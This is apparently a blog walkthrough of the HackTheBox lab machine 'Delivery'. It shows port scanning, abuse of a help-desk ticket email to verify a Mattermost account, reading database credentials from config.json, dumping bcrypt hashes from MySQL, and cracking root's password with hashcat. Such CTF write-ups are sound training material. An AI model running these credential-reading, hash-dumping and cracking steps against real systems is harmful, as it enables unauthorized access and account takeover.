Delivery - [HTB]

Cover Image for Delivery - [HTB]
Marmeus
Marmeus

Introduction

Delivery is a very easy Linux machine from HackTheBox where the hacker will have to find the way to validate an email using two instaled services on the machine, in order to get the user flag. Later, will have to find the root hash, stored in a web page databaseFinally, in order to obatin the root password will have to crack the hash using hashcat rules.

Enumeration

As always, let's start finding all opened ports in the machine with nmap.

kali@kali:$ sudo nmap -sS -T5 -p- -n --open -oN AllPorts.txt 10.129.51.179
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 14:39 EST
Nmap scan report for 10.129.51.179
Host is up (0.039s latency).
Not shown: 64781 closed ports, 751 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8065/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:$ sudo nmap -sC -sV -p22,80,8065 -n -oN PortsDepth.txt 10.129.51.179
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-09 14:43 EST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 14:43 (0:00:12 remaining)
Nmap scan report for 10.129.51.179
Host is up (0.039s latency).    
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown  
 fingerprint-strings:[0/33]
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Wed, 06 Jan 2021 13:40:04 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 9c5e8n7nxbreix9js5ejzn5ero
|     X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false
|     Date: Sat, 09 Jan 2021 19:43:32 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 09 Jan 2021 19:43:32 GMT
|_    Content-Length: 0

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.97 seconds

Inside the port 80 there is an static web page named "DELIVERY" with a "Contact us" button.

deliveryWeb

Clicking on it, we can see two links: http://helpdesk.delivery.htb/ and http://delivery.htb:8065/. Both pointing to two different services and domains.

Contact us

For one side in, helpdesk.delivery.htb we can find a Ticket System developed by osTicket, where we can create tickets for getting in contact with the support center.

In order to create and account we need to verify an email. This is impossible because HTB machines doesn't have access to the Internet, so we can not receive any eamil to our personal accounts.

Support Center

For the other side, delivery.htb:8065 turns out to be a Mattermost service (an open-source, self-hostable online chat service) that also requires validating the email for signing up.

matermost

Explotation

We can obtain an email creating a ticket in Help Desk.

Ticket creation
Ticket request created

The email address can be used to send information to the ticket. Hence, we can use the address to verify the email in the Mattermost service.

Mattermost web page
Mattermost email verify

Then, we need to check the ticket, obtaining the verification link.

Note: You need to provided the email address used to open a ticket.

Check ticket status
Cheking received email

Finally, sign in with the user you created, skip the tutorial and click on "Internal" and you will get the credential for accessings to login into the machine as maildeliverer through SSH (Getting the user flag). Furthermore, these credentials can also be used for signing in http://helpdesk.delivery.htb/scp/users.php

maildeliverer:Youve_G0t_Mail!

Privilege escalation

Welcome message

In the previous picture the root user is telling that if an attacker get all the hashes from the web page, he or she will be able to retrieve the password using HashCat. So, looking in the Mattermos documentation the mysql credentials are stored at /opt/mattermost/config/config.json.

maildeliverer@Delivery:~$ cat /opt/mattermost/config/config.json
[...]
   "SqlSettings": {
       "DriverName": "mysql",
       "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
       "DataSourceReplicas": [],
       "DataSourceSearchReplicas": [],
       "MaxIdleConns": 20,
       "ConnMaxLifetimeMilliseconds": 3600000,
       "MaxOpenConns": 300,
       "Trace": false,
       "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
       "QueryTimeout": 30,
       "DisableDatabaseSearch": false
   },
[...]

The credentials are:

mmuser:Crack_The_MM_Admin_PW

Now we can extract all the hashes from the database.

maildeliverer@Delivery:~$ mysql -u mmuser -pCrack_The_MM_Admin_PW
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
           [...]
| Users                  |
+------------------------+
MariaDB [mattermost]> select Username, Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| marmeus                          | $2a$10$1uIPq5C5LMTmwoK7QYLV6.h6K3.m9ya03dgTF03CzXnweUcEI3zbC |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
8 rows in set (0.000 sec)

Now, we can use HashCat to get the root's password. For that I used hashcat for windows that you can download it here. But first we need to identify which type of hash are we working with, so I am using hashid.

kali@kali:$ hashid
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO      
Analyzing '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO'
[+] Blowfish(OpenBSD) 
[+] Woltlab Burning Board 4.x 
[+] bcrypt 

Based on what the user "root" said in the mattermost chat, I created my own mask which tries numbers, lower and upper case letters at the end of PleaseSubscribe!, retrieving the password in a couple of seconds.

Note: You could try obtaining the root password by applying predetermined hashcat rules such us base64.

D:\Users\Marmeus\Downloads\hashcat-6.1.1>hashcat.exe -m 3200 -a 3 hash.txt -1 ?l?u?d PleaseSubscribe!?1?1?1 --increment --increment-min 16  
hashcat (v6.1.1) starting...
* Device #1: CUDA SDK Toolkit installation NOT detected.       
CUDA SDK Toolkit installation required for proper device support and utilization Falling back to OpenCL Runtime
* Device #1: WARNING! Kernel exec timeout is not disabled.  
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see http://hashcat.net/q/timeoutpatch
* Device #2: Unstable OpenCL driver detected!      
This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL API (OpenCL 1.2 CUDA 11.0.140) - Platform #1 [NVIDIA Corporation]
======================================================================== 
* Device #1: GeForce GTX 960M, 1664/2048 MB (512 MB allocatable), 5MCU                                 
OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]                                       
=============================================================                                         
* Device #2: Intel(R) HD Graphics 530, skipped     
Minimum password length supported by kernel: 0     
Maximum password length supported by kernel: 72     
INFO: All hashes found in potfile! Use --show to display them.                                       
Started: Sun Jan 10 01:43:37 2021                   
Stopped: Sun Jan 10 01:43:39 2021                   
D:\Users\Marmeus\Downloads\hashcat-6.1.1>hashcat.exe -m 3200 -a 3 hash.txt -1 ?l?u?d PleaseSubscribe!?1?1?1 --increment --increment-min 16 --show                                           
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21                       
D:\Users\Marmeus\Downloads\hashcat-6.1.1>  

Finally, we can use this password to become root, getting the root flag.

maildeliverer@Delivery:/opt/mattermost/config$ su root
Password: PleaseSubscribe!21
root@Delivery:/opt/mattermost/config# wc -c /root/root.txt 
33 /root/root.txt